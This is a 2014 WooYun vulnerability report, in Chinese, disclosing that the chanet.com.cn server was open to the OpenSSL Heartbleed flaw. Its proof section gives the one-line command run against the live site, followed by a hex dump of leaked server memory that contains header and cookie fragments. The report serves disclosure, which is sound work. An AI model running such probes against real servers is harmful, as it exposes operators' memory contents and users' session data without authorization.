漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-056988
漏洞标题:chanet运维不当导致获取服务器敏感信息
相关厂商:成果网
漏洞作者: 瓦力
提交时间:2014-04-14 11:27
修复时间:2014-05-29 11:28
公开时间:2014-05-29 11:28
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
OpenSSL “心血”漏洞
详细说明:
Heartbleed https://www.chanet.com.cn/
漏洞证明:
$ Heartbleed https://www.chanet.com.cn/
2014/04/14 09:30:54 ([]uint8) {
00000000 02 00 79 68 65 61 72 74 62 6c 65 65 64 2e 66 69 |..yheartbleed.fi|
00000010 6c 69 70 70 6f 2e 69 6f 59 45 4c 4c 4f 57 20 53 |lippo.ioYELLOW S|
00000020 55 42 4d 41 52 49 4e 45 f3 b2 c3 06 f3 d9 cf f4 |UBMARINE........|
00000030 6b f4 0c 70 90 87 cf 56 92 0f 21 fd f2 a5 63 6e |k..p...V..!...cn|
00000040 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e |..Accept-Encodin|
00000050 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 |g: gzip, deflate|
00000060 0d 0a 43 6f 6f 6b 69 65 3a 20 41 70 61 63 68 65 |..Cookie: Apache|
00000070 3d 31 32 37 2e 30 2e 30 2e 31 2e 31 df af de 3e |=127.0.0.1.1...>|
00000080 ea 4a 32 c7 d6 73 ce fa 18 5a 02 c1 |.J2..s...Z..|
修复方案:
版权声明:转载请注明来源 瓦力@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝